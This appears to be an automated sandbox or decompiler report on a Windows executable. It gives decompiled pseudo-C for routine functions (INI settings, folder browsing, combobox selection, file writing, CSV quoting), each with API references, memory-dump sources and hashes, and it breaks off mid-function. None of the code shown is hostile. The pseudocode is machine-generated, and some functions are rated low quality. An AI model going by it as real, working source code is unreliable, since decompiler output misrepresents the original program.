                                                                                                                                                                                                                          • Instruction ID: bfbe461037e943c94cde62efea7f8de8011d206b5eb27adb1998baad11e83e26
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F116A722046019FD328DF2DC881A2BF7E5EFD8300B248C2EE49A97395DB35E801CB58
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 35%
                                                                                                                                                                                                                          			E00409DDC(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
                                                                                                                                                                                                                          				char _v16390;
                                                                                                                                                                                                                          				short _v16392;
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          				intOrPtr* _t30;
                                                                                                                                                                                                                          				intOrPtr* _t34;
                                                                                                                                                                                                                          				signed int _t36;
                                                                                                                                                                                                                          				signed int _t37;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t30 = __ecx;
                                                                                                                                                                                                                          				E0040B550(0x4004, __ecx);
                                                                                                                                                                                                                          				_push(0x4000);
                                                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                                                          				_v16392 = 0;
                                                                                                                                                                                                                          				_t34 = _t30;
                                                                                                                                                                                                                          				_push( &_v16390);
                                                                                                                                                                                                                          				if(_a4 == 0) {
                                                                                                                                                                                                                          					memset();
                                                                                                                                                                                                                          					GetPrivateProfileStringW(_a8, _a12, 0x40c4e8,  &_v16392, 0x2000, _a20);
                                                                                                                                                                                                                          					asm("sbb esi, esi");
                                                                                                                                                                                                                          					_t37 =  ~_t36;
                                                                                                                                                                                                                          					E004051B8( &_v16392, _t34, _a16);
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					memset();
                                                                                                                                                                                                                          					E0040512F(_a16,  *_t34,  &_v16392);
                                                                                                                                                                                                                          					_t37 = WritePrivateProfileStringW(_a8, _a12,  &_v16392, _a20);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t37;
                                                                                                                                                                                                                          			}











                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00409E08
                                                                                                                                                                                                                            • Part of subcall function 0040512F: _snwprintf.MSVCRT ref: 00405174
                                                                                                                                                                                                                            • Part of subcall function 0040512F: memcpy.MSVCRT ref: 00405184
                                                                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409E31
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00409E3B
                                                                                                                                                                                                                          • GetPrivateProfileStringW.KERNEL32 ref: 00409E5D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1127616056-0
                                                                                                                                                                                                                          • Opcode ID: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                                                                                                                                                          • Instruction ID: edc1d82326a177a4eed1c31c26edb3d60bf211bedf20f6070ddf32627235df0d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9117071500119AFDF11AF64DD06E9E7BA9EF04704F1000BAFB05B6191E7319E608BAD
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 37%
                                                                                                                                                                                                                          			E0040ACFC(wchar_t* __esi, char _a4, intOrPtr _a8) {
                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                          				wchar_t* _v16;
                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                          				intOrPtr _v36;
                                                                                                                                                                                                                          				char _v40;
                                                                                                                                                                                                                          				long _v564;
                                                                                                                                                                                                                          				char* _t18;
                                                                                                                                                                                                                          				char* _t22;
                                                                                                                                                                                                                          				wchar_t* _t23;
                                                                                                                                                                                                                          				intOrPtr* _t24;
                                                                                                                                                                                                                          				intOrPtr* _t26;
                                                                                                                                                                                                                          				intOrPtr _t30;
                                                                                                                                                                                                                          				void* _t35;
                                                                                                                                                                                                                          				char* _t36;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t18 =  &_v8;
                                                                                                                                                                                                                          				_t30 = 0;
                                                                                                                                                                                                                          				__imp__SHGetMalloc(_t18);
                                                                                                                                                                                                                          				if(_t18 >= 0) {
                                                                                                                                                                                                                          					_v40 = _a4;
                                                                                                                                                                                                                          					_v28 = _a8;
                                                                                                                                                                                                                          					_t22 =  &_v40;
                                                                                                                                                                                                                          					_v36 = 0;
                                                                                                                                                                                                                          					_v32 = 0;
                                                                                                                                                                                                                          					_v24 = 4;
                                                                                                                                                                                                                          					_v20 = E0040AC81;
                                                                                                                                                                                                                          					_v16 = __esi;
                                                                                                                                                                                                                          					__imp__SHBrowseForFolderW(_t22, _t35);
                                                                                                                                                                                                                          					_t36 = _t22;
                                                                                                                                                                                                                          					if(_t36 != 0) {
                                                                                                                                                                                                                          						_t23 =  &_v564;
                                                                                                                                                                                                                          						__imp__SHGetPathFromIDListW(_t36, _t23);
                                                                                                                                                                                                                          						if(_t23 != 0) {
                                                                                                                                                                                                                          							_t30 = 1;
                                                                                                                                                                                                                          							wcscpy(__esi,  &_v564);
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_t24 = _v8;
                                                                                                                                                                                                                          						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
                                                                                                                                                                                                                          						_t26 = _v8;
                                                                                                                                                                                                                          						 *((intOrPtr*)( *_t26 + 8))(_t26);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t30;
                                                                                                                                                                                                                          			}





















                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SHGetMalloc.SHELL32(?), ref: 0040AD0C
                                                                                                                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040AD3E
                                                                                                                                                                                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040AD52
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040AD65
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3917621476-0
                                                                                                                                                                                                                          • Opcode ID: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                                                                                                                                                          • Instruction ID: e4c3f7e47c5e56e8be22c5f757262c1ae757d72ab7f138bc7c026954c7aa5c2b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B011FAB5900208EFDB10EFA9D9889AEB7F8FF48300F10416AE905E7240D738DA05CFA5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00404A44(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                          				long _v12;
                                                                                                                                                                                                                          				long _t13;
                                                                                                                                                                                                                          				void* _t14;
                                                                                                                                                                                                                          				struct HWND__* _t24;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t24 = GetDlgItem(_a4, _a8);
                                                                                                                                                                                                                          				_t13 = SendMessageW(_t24, 0x146, 0, 0);
                                                                                                                                                                                                                          				_v12 = _t13;
                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                          				if(_t13 <= 0) {
                                                                                                                                                                                                                          					L3:
                                                                                                                                                                                                                          					_t14 = 0;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
                                                                                                                                                                                                                          						_v8 = _v8 + 1;
                                                                                                                                                                                                                          						if(_v8 < _v12) {
                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							goto L3;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						goto L4;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					SendMessageW(_t24, 0x14e, _v8, 0);
                                                                                                                                                                                                                          					_t14 = 1;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				L4:
                                                                                                                                                                                                                          				return _t14;
                                                                                                                                                                                                                          			}








                                                                                                                                                                                                                          0x00404a94
                                                                                                                                                                                                                          0x00404a98

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00404A52
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00404A6A
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00404A80
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00404AA3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$Item
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3888421826-0
                                                                                                                                                                                                                          • Opcode ID: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                                                                                                                                                          • Instruction ID: a803108f18d13bdb161ef9cfeaea96f484be20865a03d7d0c1e8cd60aac843f5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02F01DB1A4010CFEEB018FD59DC1DAF7BBDEB89755F104479F604E6150D2709E41AB64
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                                                          			E004072D8(void* __ecx, void* __eflags, void* _a4, short* _a8) {
                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                          				void _v8199;
                                                                                                                                                                                                                          				char _v8200;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				E0040B550(0x2004, __ecx);
                                                                                                                                                                                                                          				_v8200 = 0;
                                                                                                                                                                                                                          				memset( &_v8199, 0, 0x1fff);
                                                                                                                                                                                                                          				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
                                                                                                                                                                                                                          				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
                                                                                                                                                                                                                          			}







                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004072FD
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00407316
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00407328
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00407339
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2754987064-0
                                                                                                                                                                                                                          • Opcode ID: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                                                                                                                                                          • Instruction ID: b20814eff52bbcc052d034fa9df9783175f47b69a9638c3bed99c582471ba408
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7F0FFB740022CBEEB05A7949DC9DDB776CDB08358F0001B6B715E2192D6749E448BA8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00408DC8(void** __eax, struct HWND__* _a4) {
                                                                                                                                                                                                                          				int _t7;
                                                                                                                                                                                                                          				void** _t11;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t11 = __eax;
                                                                                                                                                                                                                          				if( *0x4101b4 == 0) {
                                                                                                                                                                                                                          					memcpy(0x40f5c8,  *__eax, 0x50);
                                                                                                                                                                                                                          					memcpy(0x40f2f8,  *(_t11 + 4), 0x2cc);
                                                                                                                                                                                                                          					 *0x4101b4 = 1;
                                                                                                                                                                                                                          					_t7 = DialogBoxParamW(GetModuleHandleW(0), 0x6b, _a4, E00408ADB, 0);
                                                                                                                                                                                                                          					 *0x4101b4 =  *0x4101b4 & 0x00000000;
                                                                                                                                                                                                                          					 *0x40f2f4 = _t7;
                                                                                                                                                                                                                          					return 1;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					return 1;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          			}






                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1386444988-0
                                                                                                                                                                                                                          • Opcode ID: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                                                                                                                                                          • Instruction ID: 2efff09082e6186f10957894d43819ba35d003f4fc085d6afb87634920226402
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FAF08231695310BBD7206BA4BE0AB473AA0D700B16F2484BEF241B54E0C7FA04559BDC
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E004050E1(wchar_t* __edi, wchar_t* _a4) {
                                                                                                                                                                                                                          				int _t10;
                                                                                                                                                                                                                          				int _t12;
                                                                                                                                                                                                                          				void* _t23;
                                                                                                                                                                                                                          				wchar_t* _t24;
                                                                                                                                                                                                                          				signed int _t25;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t24 = __edi;
                                                                                                                                                                                                                          				_t25 = wcslen(__edi);
                                                                                                                                                                                                                          				_t10 = wcslen(_a4);
                                                                                                                                                                                                                          				_t23 = _t10 + _t25;
                                                                                                                                                                                                                          				if(_t23 >= 0x3ff) {
                                                                                                                                                                                                                          					_t12 = _t10 - _t23 + 0x3ff;
                                                                                                                                                                                                                          					if(_t12 > 0) {
                                                                                                                                                                                                                          						wcsncat(__edi + _t25 * 2, _a4, _t12);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					wcscat(__edi + _t25 * 2, _a4);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t24;
                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcslen$wcscatwcsncat
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 291873006-0
                                                                                                                                                                                                                          • Opcode ID: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                                                                                                                                                          • Instruction ID: d151cadb35ebc04527c95d650d15a6f00d765f1fde14687ca002c1c28d544fc6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3CE0EC36908703AECB042625AC45C6F375DEF84368B50843FF410E6192EF3DD51556DD
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00402DDD(struct HWND__* __eax, void* __ecx) {
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				struct HWND__* _t11;
                                                                                                                                                                                                                          				struct HWND__* _t14;
                                                                                                                                                                                                                          				struct HWND__* _t15;
                                                                                                                                                                                                                          				void* _t16;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t14 = __eax;
                                                                                                                                                                                                                          				_t16 = __ecx;
                                                                                                                                                                                                                          				 *((intOrPtr*)(__ecx + 0x10)) = __eax;
                                                                                                                                                                                                                          				GetClientRect(__eax, __ecx + 0xa14);
                                                                                                                                                                                                                          				 *(_t16 + 0xa24) =  *(_t16 + 0xa24) & 0x00000000;
                                                                                                                                                                                                                          				_t15 = GetWindow(GetWindow(_t14, 5), 0);
                                                                                                                                                                                                                          				do {
                                                                                                                                                                                                                          					E00402D99(_t15, _t16);
                                                                                                                                                                                                                          					_t11 = GetWindow(_t15, 2);
                                                                                                                                                                                                                          					_t15 = _t11;
                                                                                                                                                                                                                          				} while (_t15 != 0);
                                                                                                                                                                                                                          				return _t11;
                                                                                                                                                                                                                          			}










                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetClientRect.USER32 ref: 00402DEF
                                                                                                                                                                                                                          • GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                                                                                                                                                          • GetWindow.USER32(00000000), ref: 00402E0A
                                                                                                                                                                                                                            • Part of subcall function 00402D99: GetWindowRect.USER32 ref: 00402DA8
                                                                                                                                                                                                                            • Part of subcall function 00402D99: MapWindowPoints.USER32 ref: 00402DC3
                                                                                                                                                                                                                          • GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$Rect$ClientPoints
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4235085887-0
                                                                                                                                                                                                                          • Opcode ID: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                                                                                                                                                          • Instruction ID: 77c271d885eafffee951e9f606c1c6e1ef1898ae553cc6e200c9330dee891b18
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8E092722407006BE22197398DC9FABB2EC9FC9761F11053EF504E7280DBB8DC014669
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 72%
                                                                                                                                                                                                                          			E0040B6A6() {
                                                                                                                                                                                                                          				intOrPtr _t1;
                                                                                                                                                                                                                          				intOrPtr _t2;
                                                                                                                                                                                                                          				intOrPtr _t3;
                                                                                                                                                                                                                          				intOrPtr _t4;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t1 =  *0x41c458;
                                                                                                                                                                                                                          				if(_t1 != 0) {
                                                                                                                                                                                                                          					_push(_t1);
                                                                                                                                                                                                                          					L0040B272();
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t2 =  *0x41c460;
                                                                                                                                                                                                                          				if(_t2 != 0) {
                                                                                                                                                                                                                          					_push(_t2);
                                                                                                                                                                                                                          					L0040B272();
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t3 =  *0x41c45c;
                                                                                                                                                                                                                          				if(_t3 != 0) {
                                                                                                                                                                                                                          					_push(_t3);
                                                                                                                                                                                                                          					L0040B272();
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t4 =  *0x41c464;
                                                                                                                                                                                                                          				if(_t4 != 0) {
                                                                                                                                                                                                                          					_push(_t4);
                                                                                                                                                                                                                          					L0040B272();
                                                                                                                                                                                                                          					return _t4;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t4;
                                                                                                                                                                                                                          			}

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                                          • Opcode ID: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                                                                                                                                                          • Instruction ID: 3bd5cb9a150004800b4bedd87e83f43d671674f7d7a0a5890c52a9af046e0154
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96E00261B8820196DD249A7AACD5D6B239C9A05794314847EF804E72E5DF39D44045ED
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                                                          			E00407362(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                          				wchar_t* _v20;
                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          				signed int _t39;
                                                                                                                                                                                                                          				wchar_t* _t41;
                                                                                                                                                                                                                          				signed int _t45;
                                                                                                                                                                                                                          				signed int _t48;
                                                                                                                                                                                                                          				wchar_t* _t53;
                                                                                                                                                                                                                          				wchar_t* _t62;
                                                                                                                                                                                                                          				void* _t66;
                                                                                                                                                                                                                          				intOrPtr* _t68;
                                                                                                                                                                                                                          				void* _t70;
                                                                                                                                                                                                                          				wchar_t* _t75;
                                                                                                                                                                                                                          				wchar_t* _t79;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t66 = __ebx;
                                                                                                                                                                                                                          				_t75 = 0;
                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                          				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                          						_t39 =  *( *((intOrPtr*)(_t66 + 0x30)) + _v8 * 4);
                                                                                                                                                                                                                          						_t68 = _a8;
                                                                                                                                                                                                                          						if(_t68 != _t75) {
                                                                                                                                                                                                                          							_t79 =  *((intOrPtr*)( *_t68))(_t39,  *((intOrPtr*)(_t66 + 0x60)));
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							_t79 =  *( *((intOrPtr*)(_t66 + 0x2d4)) + 0x10 + _t39 * 0x14);
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_t41 = wcschr(_t79, 0x2c);
                                                                                                                                                                                                                          						_pop(_t70);
                                                                                                                                                                                                                          						if(_t41 != 0) {
                                                                                                                                                                                                                          							L8:
                                                                                                                                                                                                                          							_v20 = _t75;
                                                                                                                                                                                                                          							_v28 = _t75;
                                                                                                                                                                                                                          							_v36 = _t75;
                                                                                                                                                                                                                          							_v24 = 0x100;
                                                                                                                                                                                                                          							_v32 = 1;
                                                                                                                                                                                                                          							_v16 = 0x22;
                                                                                                                                                                                                                          							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
                                                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                                                          								_t45 =  *_t79 & 0x0000ffff;
                                                                                                                                                                                                                          								__eflags = _t45;
                                                                                                                                                                                                                          								_v12 = _t45;
                                                                                                                                                                                                                          								_t77 =  &_v36;
                                                                                                                                                                                                                          								if(__eflags == 0) {
                                                                                                                                                                                                                          									break;
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          								__eflags = _t45 - 0x22;
                                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                                          									_push( &_v12);
                                                                                                                                                                                                                          									_t48 = 1;
                                                                                                                                                                                                                          									__eflags = 1;
                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                          									_push(L"\"\"");
                                                                                                                                                                                                                          									_t48 = _t45 | 0xffffffff;
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          								E0040565D(_t48, _t70, _t77, __eflags);
                                                                                                                                                                                                                          								_t79 =  &(_t79[0]);
                                                                                                                                                                                                                          								__eflags = _t79;
